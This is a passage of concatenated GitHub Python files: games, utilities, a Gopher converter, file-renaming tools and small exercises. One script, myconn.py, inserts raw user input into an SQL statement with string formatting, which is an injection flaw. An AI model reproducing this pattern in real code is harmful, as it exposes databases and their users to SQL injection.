'Tiensbakung@googlemail.com',\n 'version': '#0.1#',\n 'install_requires': [],\n 'packages': ['NAME'],\n 'scripts': [],\n 'name': 'interc'\n}\n\nsetup(**config)\n","repo_name":"Tiensbakung/interc","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16787933614","text":"class Car:\n def __init__(self, speed, color, name, is_police):\n self._speed = speed\n self._color = color\n self._name = name\n self._is_police = is_police\n\n def go(self):\n print(\"Car started\")\n\n def stop(self):\n print(\"Car stopped\")\n\n def turn(self, direction):\n print(f\"Car turned to {direction}\")\n\n def show_speed(self):\n print(f\"Speed: {self._speed}\")\n\n\nclass TownCar(Car):\n def show_speed(self):\n print(f\"Speed: {self._speed}\")\n try:\n if self._speed > 60:\n print(\"You go really fast!\")\n except ValueError:\n print(\"Value error\")\n\n\nclass SportCar(Car):\n pass\n\n\nclass WorkCar(Car):\n def show_speed(self):\n print(f\"Speed: {self._speed}\")\n try:\n if self._speed > 40:\n print(\"You go really fast!\")\n except ValueError:\n print(\"Value error\")\n\n\nclass PoliceCar(Car):\n pass\n\n\ntown_car = TownCar(60, \"blue\", \"Mercedes\", False)\ntown_car.go()\ntown_car.show_speed()\n\nsport_car = SportCar(100, \"red\", \"Lamborghini\", False)\nsport_car.go()\nsport_car.turn(\"left\")\n\nwork_car = WorkCar(50, \"yellow\", \"Ford\", False)\nwork_car.go()\nwork_car.show_speed()\nwork_car.stop()\n\npolice = PoliceCar(70, \"white\", \"Gaz\", True)\npolice.go()\npolice.show_speed()\npolice.turn(\"right\")\npolice.stop()\n","repo_name":"Booharin/lesson_6","sub_path":"task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7947560552","text":"\nfrom flask import Flask, request, redirect, url_for\nimport psycopg2\n\napp = Flask(__name__)\n\ndef MyDBConn():\n\tcon=psycopg2.connect(database=\"sample\")\n\tc=con.cursor()\n\t#c.execute(\"insert into simple values('123','badulla')\")\n\trollno=raw_input(\"Enter Rollno:\")\n\tname=str(raw_input(\"Enter Name:\"))\n\tc.execute(\"insert into simple values({},'{}')\".format(rollno,name))\n\tcon.commit()\n\tif c:\n\t\tprint(\"Inserted successfully\")\n\telse:\n\t\tprint(\"Sorry,Try again\")\n\tcon.close()\n\t\n\ndef Retrive():\n\tcon=psycopg2.connect(database=\"sample\")\n\tc=con.cursor()\n\tc.execute(\"select * from simple\")\n\tprint(c.fetchall())\n\tcon.close()\n\n\n\nif __name__ == '__main__':\n\tMyDBConn()\n\tRetrive()","repo_name":"BadullaShaik/Demo-Project","sub_path":"FSND-Virtual-Machine/vagrant/MyConnection/myconn.py","file_name":"myconn.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34114089115","text":"# -*- coding: utf-8 -*-\nimport os, re, shutil\n\nCLEAN_REGEX = re.compile(\"(.+)\\s*\\(.+\\)\", re.IGNORECASE)\nIGNORE = [\"libobjc.A.dylib\", \"libSystem.B.dylib\", \"/System/Library/Frameworks\",\n \"/usr/lib/system/\"]\n\ndef checkIgnore(path):\n for elm in IGNORE:\n if path.find(elm) != -1:\n return True\n return False\n\ndef cleanEntry(path):\n res = CLEAN_REGEX.findall(path.strip())\n if len(res) == 0:\n return None\n res = res[0].strip()\n if checkIgnore(res):\n return None\n return res\n\ndef getIdLibs(lib, hasId = True):\n lines = os.popen(\"otool -L %s\" % 
lib).readlines()\n id = cleanEntry(lines[1])\n libs = []\n if not hasId:\n libs.append(id)\n id = None\n for dep in lines[2:]:\n dep = cleanEntry(dep)\n if dep: libs.append(dep)\n return [id, libs]\n\ndef otoolID(path, id):\n #print(\"otool id {} on {}\".format(id, path))\n os.popen(\"install_name_tool -id %s %s\" % (id, path))\n\ndef otoolChange(path, old, new):\n #print(\"otool change {} -> {} on {}\".format(old, new, path))\n os.popen(\"install_name_tool -change %s %s %s\" % (old, new, path))\n\ndef fixEntry(entry):\n return \"@executable_path/{}\".format(os.path.basename(entry))\n\ndef hasSuffix(path):\n return len(os.path.splitext(path)[1]) > 0\n\ndef localizeDep(dep):\n hasId = hasSuffix(dep)\n [id, libs] = getIdLibs(dep, hasId)\n if id:\n otoolID(dep, fixEntry(id))\n for lib in libs:\n otoolChange(dep, lib, fixEntry(lib))\n\ndef copy(dep, dst):\n #print(\"Copying {}\".format(dep))\n newfile = dst + os.path.sep + os.path.basename(dep)\n if os.path.exists(newfile):\n return newfile\n shutil.copyfile(dep, newfile)\n return newfile\n\ndef getDeps(bin):\n lines = os.popen(\"otool -L %s\" % bin).readlines()\n deps = []\n for dep in lines[1:]:\n dep = cleanEntry(dep)\n if dep: deps.append(dep)\n return deps\n","repo_name":"netromdk/blurator","sub_path":"scripts/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2956295139","text":"# 面倒なので、座標系でも表記は統一していない(統一したい)\n\nimport numpy\n\nclass othello():\n def __init__(self,h,w):\n # 全方向の単位ベクトル\n self.vec=[[1,0],[-1,0],[0,1],[0,-1],[1,1],[-1,-1],[1,-1],[-1,1]]\n\n self.height=h\n self.width=w\n self.board=[]\n for i in range(self.height):\n tmp=[]\n for j in range(self.width):\n tmp.append('.')\n self.board.append(tmp)\n self.board[self.height//2-1][self.width//2-1]='B'\n self.board[self.height//2][self.width//2]='B'\n self.board[self.height//2][self.width//2-1]='W'\n self.board[self.height//2-1][self.width//2]='W'\n self.turn='B'\n self.turn_dict={'B':'Black','W':'White'}\n self.turn_list=['B','W']\n self.turn_index=0\n\n # ベクトル計算\n def _add_vec(self,a,b):\n return list(numpy.array(a)+numpy.array(b))\n\n def _find_marker(self,turn):\n ans=[]\n for y in range(self.height):\n for x in range(self.width):\n if self.board[y][x]=='.' 
and self._search(y,x,turn)!=None:\n ans.append([y,x])\n return ans\n\n def add_marker(self):\n marker_list=self._find_marker(self.turn)\n for mark in marker_list:\n self.board[mark[0]][mark[1]]='R'\n return\n\n # _explorer関数 -1(False):ひっくり返せるものなし 自然数n:n個ひっくり返せる\n def _explorer(self,origin,now_pos,vec):\n # そもそも範囲外の場合\n if not(0<=now_pos[0]0:\n return False\n return True\n \n def number_of_stone(self):\n ans={}\n for color in self.turn_list:\n ans[color]=0\n for line in self.board:\n for square in line:\n for turn in self.turn_list:\n if square==turn:\n ans[turn]+=1\n return ans\n\n # パスが必要かどうか\n def is_need_pass(self):\n return len(self._find_marker(self.turn))==0\n \n \ndef print_TwoDList(mylists):\n for mylist in mylists:\n for myobj in mylist:\n print(myobj,end=' ')\n print('')\n print('')\n return\n\ndef main():\n othello1=othello(8,8)\n print_TwoDList(othello1.board)\n othello1.board=[\n ['B','.','.','B','.','.','B','.'],\n ['.','W','.','W','.','W','.','.'],\n ['.','.','W','W','W','.','.','.'],\n ['B','W','W','.','W','W','W','B'],\n ['.','.','W','W','W','.','.','.'],\n ['.','W','.','W','.','B','.','.'],\n ['B','.','.','W','.','.','W','.'],\n ['.','.','.','B','.','.','.','B']]\n print_TwoDList(othello1.board)\n print('pass',othello1.is_need_pass())\n print('checkmate',othello1.is_checkmate())\n othello1.add_marker()\n othello1.put(3,3)\n print_TwoDList(othello1.board)\n print('pass',othello1.is_need_pass())\n print('checkmate',othello1.is_checkmate())\n return\n\ndef main2():\n ot=othello(8,8)\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n print(ot.turn)\n ot.next_turn()\n\nif __name__=='__main__':\n main()","repo_name":"NaokiY20/othello","sub_path":"othello.py","file_name":"othello.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1733741292","text":"import lxml.etree as E\nimport textwrap\nimport logging\nimport os\n\nPREFIXES = {\n 'b': '**',\n 'em': '*',\n 's': '~~',\n 'h1': '# ',\n 'h2': '## ',\n 'h3': '### ',\n 'h4': '#### ',\n 'h5': '##### ',\n 'h6': '###### ',\n 'p': ' '\n}\n\nPOSTFIXES = {\n 'b': '**',\n 'em': '*',\n 's': '~~',\n 'br': '\\n',\n}\n\nDOMAIN = 'invisibleup.com'\nPORT = '70'\n\ndef fix_path(basepath, path):\n if path.startswith(basepath):\n path = os.path.normpath(path)\n else:\n path = os.path.normpath(basepath + path)\n path = path.replace('\\\\', '/')\n if path[0] == '/':\n path = path[1:]\n if '.' 
not in path and path[-1] != '/':\n path += '/'\n return path\n\ndef img_tag(tag, basepath):\n ''' Handler for tags '''\n path = tag.get('src')\n alt = tag.get('alt')\n if path is None:\n return ''\n if alt is None:\n alt = os.path.basename(path)\n if 'http' in path:\n # External HTTP link\n return f'{alt}\\tURL:{path}\\t{DOMAIN}\\t{PORT}\\n'\n else:\n # Local Image\n path = fix_path(basepath, path)\n return f'I{alt}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n\ndef a_tag(tag, basepath):\n ''' Handler for tags '''\n # this is complicated\n if not tag.get('href'):\n return ''\n\n path = tag.get('href')\n if 'http' in path:\n # External HTTP link\n return f'h{tag.text}\\tURL:{path}\\t{DOMAIN}\\t{PORT}\\n'\n elif 'gopher://' in path:\n # External Gopher link\n splitted = path.split('/')\n try:\n domain, port = splitted[2].split(':')\n except ValueError:\n domain = splitted[2]\n port = '70'\n path = '/'.join(splitted[3:])\n return f'1{tag.text}\\t{path}\\t{domain}\\t{port}\\n'\n elif '.png' in path or '.jpg' in path or '.gif' in path:\n # Image\n path = fix_path(basepath, path)\n return f'I{tag.text}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n elif '.ips' in path or '.zip' in path or '.exe' in path:\n # Some sort of binary something or other\n path = fix_path(basepath, path)\n return f'9{tag.text}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n else:\n # Likely an internal Gopherspace link\n path = fix_path(basepath, path)\n return f'1{tag.text}\\t{path}\\t{DOMAIN}\\t{PORT}\\n'\n # TODO: External gopherspace links\n\ndef html2gopher(tag, basepath, width=80):\n output: str = ''\n\n if isinstance(tag, E._Comment):\n return ''\n\n if tag.text is None:\n tag.text = ''\n if tag.tail is None:\n tag.tail = ''\n\n if tag.tag != 'pre':\n tag.text = tag.text.replace('\\n', ' ')\n tag.text = tag.text.replace('\\t', '')\n tag.tail = tag.tail.replace('\\n', ' ')\n tag.tail = tag.tail.replace('\\t', '')\n\n # Tag prefix\n if tag.tag in PREFIXES:\n tag.text = PREFIXES[tag.tag] + tag.text\n # Postfix\n if tag.tag in POSTFIXES:\n tag.text += POSTFIXES[tag.tag]\n\n # Add content\n if tag.tag == 'a':\n output = a_tag(tag, basepath)\n elif tag.tag == 'img':\n output = img_tag(tag, basepath)\n elif tag.tag == 'hr':\n output += '-' * width\n elif tag.tag == 'td':\n output += tag.text\n output += '\\n' + '-' * width\n elif tag.tag == 'tr':\n output += '\\n' + '=' * width\n elif tag.tag == 'th':\n output += tag.text\n output += '\\n' + '+=' * (width // 2)\n else:\n output += tag.text\n\n # Run recursively for each subnode\n for child in tag:\n if child.tag == 'a':\n output += '\\n' + html2gopher(child, basepath, width)\n elif tag.tag == 'a' and child.tag == 'img':\n # lol whoops use alt as the label\n tag.text = child.get('alt')\n output = a_tag(tag, basepath)\n elif child.tag == 'style' or child.tag == 'script':\n continue\n elif child.tag == 'form' or (\n child.get('class') is not None and\n 'gopherignore' in child.get('class')\n ):\n output += ' ' * 12 + 'Interactive content not available via Gopher\\n'\n else:\n output += html2gopher(child, basepath, width)\n\n # \"Tail\"\n if tag.tail is not None:\n output += tag.tail\n\n del tag # being too cautious...\n\n # Word wrap\n output2 = ''\n for line in output.splitlines():\n if line.count('\\t') != 3:\n output2 += '\\n'.join(textwrap.wrap(line, width)) + '\\n'\n else:\n label, url, host, port = line.split('\\t')\n rsctype = label[0]\n label = label[1:]\n labels = textwrap.wrap(label, width)\n del label\n for label in labels:\n output2 += rsctype + label + '\\t' + url + '\\t' + host + '\\t' + port + 
'\\n'\n\n del output\n return output2\n","repo_name":"InvisibleUp/iup_server","sub_path":"iup_server/html2gopher.py","file_name":"html2gopher.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40591119533","text":"# Define a function that can accept two strings\n# as input and concatenate them and then print it in console.\n\ndef main(usr1,usr2):\n print(usr1+usr2)\n\nif __name__ == '__main__':\n usr1 = input(\"Enter first string: \")\n usr2 = input(\"Enter second string: \")\n\n main(usr1,usr2)","repo_name":"hasuq33/My_Python_Program","sub_path":"Practical_Program/Program30.py","file_name":"Program30.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72087851047","text":"\"Batch rename script can load multiple files from a directory and adds or removes specified amount of characters to/from the beginning/end of the filename\"\n\nimport tkinter as tk\nfrom tkinter import filedialog, messagebox\nimport ntpath\nfrom utilities import *\nfrom os import rename\nfrom os.path import join\nimport xml.etree.ElementTree as ET\nfrom random import randint\n\nversion=\"v1.1 ™.G\"\n\nconfigfile=join(\"Configuration\",\"config.xml\")\nconfigtree=ET.parse(configfile)\nconfigroot=configtree.getroot()\n\noriginalX=int(configroot.find(\"OriginalX\").text)\noriginalY=int(configroot.find(\"OriginalY\").text)\nmaincolor=configroot.find(\"MainColor\").text\ntextcolor=configroot.find(\"TextColor\").text\nButtonBorderColor=configroot.find(\"ButtonBorderColor\").text\nButtonPressColor=configroot.find(\"ButtonPressColor\").text\n\n\ndef togglemode(*args):\n global RemoveFrame, AppendFrame, RemButtonB, RemButtonE, sB, IndexB, RandomB, StringB, RandomSB, SameStrEn\n remframe=[RemButtonE,RemButtonB,sB]\n appendframe=[IndexB,RandomB, StringB, RandomSB, SameStrEn]\n if str(Mode.get())==\"Remove\":\n for widget in remframe:\n widget.config(state=\"normal\")\n for widget in appendframe:\n widget.config(state=\"disabled\")\n RemoveFrame.config(bd=2)\n AppendFrame.config(bd=0)\n else:\n for widget in remframe:\n widget.config(state=\"disabled\")\n for widget in appendframe:\n widget.config(state=\"normal\")\n RemoveFrame.config(bd=0)\n AppendFrame.config(bd=2)\n\n\n\ndef scrolltables(direction):\n global InList, OutList\n for table in (InList, OutList):\n table.yview\n\n\n\n\ndef preview(*args):\n global files,newname, Mode, OutList, sB, RemoveBeginning, AppendHow, RandomSB, SameStrEn\n OutList.delete(0, \"end\")\n thismuch=sB.get()\n newname=[]\n runningindex=1\n randomnumbers=int(RandomSB.get())\n samestr=str(SameStrEn.get())\n for f in files:\n if str(Mode.get())==\"Remove\":\n if RemoveBeginning.get()==True:\n name=str(ntpath.basename(f))[int(thismuch):]\n OutList.insert(\"end\",name)\n newname.append(name)\n else:\n if int(thismuch)==0:\n name=str(ntpath.basename(f)[int(thismuch):])\n OutList.insert(\"end\", name )\n newname.append(name)\n else:\n name=str(ntpath.basename(f))[:-int(thismuch)]\n OutList.insert(\"end\", name)\n newname.append(name)\n else:\n if str(AppendHow.get())==\"Index\":\n AmountOfFiles=len(files)\n LeadingZeros=len(str(AmountOfFiles))\n name=str(runningindex).zfill(LeadingZeros)+\"_\"+str(ntpath.basename(f))\n OutList.insert(\"end\", name)\n newname.append(name)\n runningindex+=1\n elif str(AppendHow.get())==\"Random\":\n randomstring=\"\"\n for i in range(0, randomnumbers):\n 
UpperLower=randint(1,2)\n if UpperLower==1:\n char=randint(65,90)\n else:\n char=randint(97, 122)\n randomstring+=chr(char)\n name=randomstring+\"_\"+str(ntpath.basename(f))\n OutList.insert(\"end\",name)\n newname.append(name)\n else:\n name=samestr+\"_\"+str(ntpath.basename(f))\n OutList.insert(\"end\",name)\n newname.append(name)\n\n\n\n\n\n\n\n\n\ndef openfiles(*args):\n global InList, files, sB, doB, OutList\n InList.delete(0,\"end\")\n files=filedialog.askopenfilenames()\n longest=[]\n if len(files)==0:\n OutList.delete(0,\"end\")\n messagebox.showwarning(\"\",\"No files specified!\")\n else:\n for f in files:\n InList.insert(\"end\",ntpath.basename(f))\n longest.append(len(ntpath.basename(f)))\n sB.config(to_=Statistics.Minimum(longest))\n preview()\n doB.config(state=\"normal\")\n\ndef RenameFunc(*args):\n global files, newname, InList, OutList, doB\n directory=ntpath.dirname(files[0])\n for n in range(0,len(newname)):\n new=join(directory, newname[n])\n rename(files[n],new)\n InList.delete(0,\"end\")\n OutList.delete(0, \"end\")\n doB.config(state=\"disabled\")\n messagebox.showinfo(\"\",\"Files are renamed\")\n\n\n\nroot=tk.Tk()\nroot.title(\"Batch rename\")\nroot.geometry(\"{}x{}\".format(originalX,originalY))\nroot.configure(bg=maincolor)\n\nfiles=[]\nnewname=[]\n\n\nButtonFrame=tk.Frame(root,bg=maincolor)\nListFrame=tk.Frame(root,bg=maincolor)\nModeSelectFrame=tk.Frame(root, bg=maincolor,bd=2, relief=\"groove\")\nModesFrame=tk.Frame(root, bg=maincolor)\nRemoveFrame=tk.Frame(ModesFrame,bg=maincolor,bd=2, relief=\"sunken\")\nAppendFrame=tk.Frame(ModesFrame, bg=maincolor,bd=0, relief=\"sunken\")\nButtonFrame.grid(row=0, column=0)\nListFrame.grid(row=1, column=0)\nModeSelectFrame.grid(row=2, column=0, pady=10)\nModesFrame.grid(row=3, column=0, padx=20)\nRemoveFrame.grid(row=0, column=0, padx=10)\nAppendFrame.grid(row=0, column=1, padx=10)\n\n# ----------------------ButtonFrame\nbrowseB=tk.Button(ButtonFrame, text=\"Open files\",highlightbackground=ButtonBorderColor,activebackground=ButtonPressColor, command=openfiles)\nbrowseB.grid(row=0, column=0, padx=200, pady=10)\ndoB=tk.Button(ButtonFrame, text=\"Start\",highlightbackground=ButtonBorderColor,activebackground=ButtonPressColor, command=RenameFunc, state=\"disabled\")\ndoB.grid(row=0, column=1,padx=200)\n\n# ----------------------ListFrame\nscrollbarY = tk.Scrollbar(ListFrame, orient='vertical')\nscrollbarY.grid(row=1, column=2,sticky=\"NS\")\ntk.Label(ListFrame, text=\"Before After\",bg=maincolor,fg=textcolor).grid(row=0,column=0,columnspan=2)\nInList = tk.Listbox(ListFrame, highlightbackground=maincolor,yscrollcommand=scrollbarY.set, width=55,selectmode=\"multiple\")\nOutList = tk.Listbox(ListFrame,highlightbackground=maincolor, yscrollcommand=scrollbarY.set, width=55,selectmode=\"multiple\")\nscrollbarY.config(command=scrolltables)\nInList.grid(row=1, column=0)\nOutList.grid(row=1, column=1)\n\n# ----------------------ModeSelectFrame\nMode=tk.StringVar()\nMode.set(\"Remove\")\ntk.Label(ModeSelectFrame, text=\"Select mode\", bg=maincolor, fg=textcolor).grid(row=0, column=0)\nModeBRem=tk.Radiobutton(ModeSelectFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Remove characters\", variable=Mode, value=\"Remove\", command=togglemode)\nModeBApp=tk.Radiobutton(ModeSelectFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Append characters \", variable=Mode, value=\"Append\", command=togglemode)\nModeBRem.grid(row=1,column=0)\nModeBApp.grid(row=2,column=0)\n\n# 
----------------------RemoveFrame\nspinboxMax=0\nRemoveBeginning=tk.BooleanVar()\nRemoveBeginning.set(True)\ntk.Label(RemoveFrame, text=\"Position & amount of characters to be removed\",bg=maincolor,fg=textcolor).grid(row=0,column=0, columnspan=2,pady=10)\nRemButtonB=tk.Radiobutton(RemoveFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Beginning\", variable=RemoveBeginning, value=True, command=preview, state=\"normal\")\nRemButtonE=tk.Radiobutton(RemoveFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor,text=\"End \", variable=RemoveBeginning, value=False,command=preview, state=\"normal\")\nRemButtonB.grid(row=1,column=0)\nRemButtonE.grid(row=2, column=0)\nsB=tk.Spinbox(RemoveFrame,highlightbackground=maincolor, width=5,from_=0,to_=0,command=preview, state=\"normal\")\nsB.grid(row=1, column=1, pady=5)\n\n# ----------------------AppendFrame\nAppendHow=tk.StringVar()\nAppendHow.set(\"Index\")\nsamestring=tk.StringVar()\nsamestring.set(\"\")\nrandomlength=tk.IntVar()\nrandomlength.set(0)\ntk.Label(AppendFrame, text=\"What to append to the beginning\",bg=maincolor,fg=textcolor).grid(row=0,column=0, columnspan=2,pady=10)\nIndexB=tk.Radiobutton(AppendFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Index \", variable=AppendHow, value=\"Index\", command=preview, state=\"disabled\")\nRandomB=tk.Radiobutton(AppendFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"Random\", variable=AppendHow, value=\"Random\", command=preview, state=\"disabled\")\nStringB=tk.Radiobutton(AppendFrame,highlightbackground=maincolor,bg=maincolor,fg=textcolor, text=\"String \", variable=AppendHow, value=\"String\", command=preview, state=\"disabled\")\nRandomSB=tk.Spinbox(AppendFrame,highlightbackground=maincolor, width=3,from_=1,to_=100,command=preview, state=\"disabled\")\nSameStrEn=tk.Entry(AppendFrame, textvariable=samestring, width=10, state=\"disabled\")\nSameStrEn.bind(\"\",preview)\nIndexB.grid(row=1, column=0)\nRandomB.grid(row=2, column=0)\nRandomSB.grid(row=2, column=1)\nStringB.grid(row=3, column=0)\nSameStrEn.grid(row=3, column=1, pady=5)\n\n\n\ntk.Label(root, text=version,bg=maincolor,fg=textcolor).grid(row=0, column=0,sticky=\"NW\")\nroot.mainloop()","repo_name":"tmg1991/Python","sub_path":"Batch_rename/Batch_rename_v1.1.py","file_name":"Batch_rename_v1.1.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5717362247","text":"import os, shutil, logging\nlogging.basicConfig(level=logging.DEBUG)\n\n###########################################################################\n## Commission: reorder all files in nested folders to a top level directory\n## preserving the original name plus origianl folder name as prefix.\n##\n##\n## Python 3.6 on Windows.\n## Autor: Martin Eías Iglesias - 2020\n###########################################################################\n\nos.system('cls' if os.name == 'nt' else 'clear')\ninital_warning = input(\"\\nThese program will reorder and move all files in these folder and nested sub-folders to a new ordered-folder with a posfix name added.\\nDo you want to continue?\\nHit 'Enter key' to continue or type 'N' to cancel:\\n\" ) or True\n\ncwd_name = os.path.basename(os.getcwd())\nposfix_folder = \"_ordenados\"\nnew_dest_folder = f\"{os.path.dirname(__file__)}\\\\{cwd_name}{posfix_folder}\"\n\n\ndef get_items_list(base_path):\n # Find files into folders and subfolders.\n items_in_folders = []\n # 
Message shown when the user rejects the initial prompt.\n if inital_warning is not True:\n logging.info(\"\\n\"*2+\" You chose cancel.\\nThe program will stop and nothing will happen to your files.\\nbye!\\n\\n\")\n exit()\n\n # Tell the user where the root folder is.\n logging.info('\\n'+f\"Start working from {cwd_name}\")\n def recursive_scan_folders(base_path):\n # Recursively scan folders for files.\n with os.scandir(base_path) as folder:\n if folder is not None:\n for content in folder:\n currentpath = os.path.dirname(content)\n if content.is_file() and content.name != os.path.basename(__file__):\n dirname = os.path.dirname(content).rsplit(\"\\\\\")[-1]\n items_in_folders.append(f'{dirname}_{content.name}')\n new_file_name = f'{dirname}_{content.name}'\n # Create the folder where the ordered files will be copied.\n os.makedirs(new_dest_folder, exist_ok=True)\n if posfix_folder not in str(dirname):\n shutil.copy(f\"{currentpath}\\\\{content.name}\", f\"{os.path.abspath(new_dest_folder)}\\\\{new_file_name}\") # Copy the file from this folder to the new ordered folder.\n elif content.is_dir():\n logging.info(\"\\t\"f'{content.name} is a folder and will not be reordered.')\n yield from recursive_scan_folders(content.path)\n else:\n logging.info('Sorry! \\n No files or folders in this path')\n\n for i in recursive_scan_folders(base_path):\n next(recursive_scan_folders(i.path))\n\n return items_in_folders\n\nif __name__ == '__main__':\n logging.info('\\n'+f\"Files ordered are: {get_items_list(os.getcwd())}\"+\"\\n\"+f\"on the new folder named: {new_dest_folder}\")","repo_name":"martinvfx/Reorder_Nested_Files","sub_path":"ReaorderNestedFiles.py","file_name":"ReaorderNestedFiles.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"9610367950","text":"from Piece import Piece\nclass Grasshopper(Piece):\n def get_neighbors(self, x, y , piece):\n neighbors = []\n n = self.Board.ground[x - 2][y]\n s = self.Board.ground[x + 2][y]\n n_w = self.Board.ground[x - 1][y - 1]\n n_e = self.Board.ground[x - 1][y + 1]\n s_w = self.Board.ground[x + 1][y - 1]\n s_e = self.Board.ground[x + 1][y + 1]\n neighbors.append((x - 2, y))\n neighbors.append((x + 2, y))\n neighbors.append((x - 1, y - 1))\n neighbors.append((x - 1, y + 1))\n neighbors.append((x + 1, y - 1))\n neighbors.append((x + 1, y + 1))\n return neighbors\n def movements(self , x , y ):\n output = set()\n n_e = self.get_ne()\n if n_e:\n destenation = n_e.get_ne()\n while destenation:\n n_e = destenation\n destenation = n_e.get_ne()\n if n_e!= \"none\":\n output.add(n_e.get_ne_pos())\n n_w = self.get_nw()\n if n_w:\n destenation = n_w.get_nw()\n while destenation:\n n_w = destenation\n destenation = n_w.get_nw()\n if n_w!= \"none\":\n output.add(n_w.get_nw_pos())\n s_e = self.get_se()\n if s_e:\n destenation = s_e.get_se()\n while destenation:\n s_e = destenation\n destenation = s_e.get_se()\n if s_e!= \"none\":\n output.add(s_e.get_se_pos())\n s_w = self.get_sw()\n if s_w:\n destenation = s_w.get_sw()\n while destenation:\n s_w = destenation\n destenation = s_w.get_sw()\n if s_w!= \"none\":\n output.add(s_w.get_sw_pos())\n n = self.get_n()\n if n:\n destenation = n.get_n()\n while destenation:\n n = destenation\n destenation = n.get_n()\n if n!= \"none\":\n output.add(n.get_n_pos())\n s = self.get_s()\n if s:\n destenation = s.get_s()\n while destenation:\n s = destenation\n destenation = s.get_s()\n if s!= \"none\":\n output.add(s.get_s_pos())\n return 
output\n def get_n(self):\n if 0 <= self.pos['x'] - 2 < self.Board.columns * 2 and 0 <= self.pos['y'] < self.Board.rows * 2:\n return self.Board.ground[self.pos[\"x\"] - 2][self.pos[\"y\"]]\n return \"none\"\n\n def get_s(self):\n if 0 <= self.pos['x'] + 2 < self.Board.columns * 2 and 0 <= self.pos['y'] < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] + 2][self.pos[\"y\"]]\n return \"none\"\n\n def get_nw(self):\n if 0 <= self.pos['x']- 1 < self.Board.columns * 2 and 0 <= self.pos['y']-1 < self.Board.rows * 2:\n return self.Board.ground[self.pos[\"x\"] - 1][self.pos[\"y\"] - 1]\n return \"none\"\n\n def get_ne(self):\n if 0 <= self.pos['x']- 1 < self.Board.columns * 2 and 0 <= self.pos['y']+ 1 < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] - 1][self.pos[\"y\"] + 1]\n return \"none\"\n\n def get_sw(self):\n if 0 <= self.pos['x'] + 1 < self.Board.columns * 2 and 0 <= self.pos['y'] - 1 < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] + 1][self.pos[\"y\"] - 1]\n return \"none\"\n\n def get_se(self):\n if 0 <= self.pos['x']+ 1 < self.Board.columns * 2 and 0 <= self.pos['y'] + 1 < self.Board.rows * 2 :\n return self.Board.ground[self.pos[\"x\"] + 1][self.pos[\"y\"] + 1]\n return \"none\"\n def get_n_pos(self):\n return self.pos[\"x\"] - 2, self.pos[\"y\"]\n\n def get_s_pos(self):\n return self.pos[\"x\"] + 2, self.pos[\"y\"]\n\n def get_nw_pos(self):\n return self.pos[\"x\"] - 1, self.pos[\"y\"] - 1\n\n def get_ne_pos(self):\n return self.pos[\"x\"] - 1, self.pos[\"y\"] + 1\n\n def get_sw_pos(self):\n return self.pos[\"x\"] + 1, self.pos[\"y\"] - 1\n\n def get_se_pos(self):\n return self.pos[\"x\"] + 1, self.pos[\"y\"] + 1","repo_name":"HannaParsa/Hive_Game","sub_path":"Grasshopper.py","file_name":"Grasshopper.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"17431873884","text":"# -*- coding: utf-8 -*-\n\"\"\"\n陌生人识别模型和表情识别模型的结合的主程序\n\n用法:\npython emotion.py\npython emotion.py --filename tests/room_01.mp4\n\"\"\"\n\n# 导入包\nimport argparse\nfrom oldcare.facial import FaceUtil\nfrom PIL import Image, ImageDraw, ImageFont\nfrom oldcare.utils import fileassistant\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array\nimport cv2\nimport time\nimport numpy as np\nimport os\nimport imutils\nimport subprocess\n\n\n# # 得到当前时间\n# current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n# time.localtime(time.time()))\n# print('[INFO] %s 陌生人检测程序和表情检测程序启动了.' 
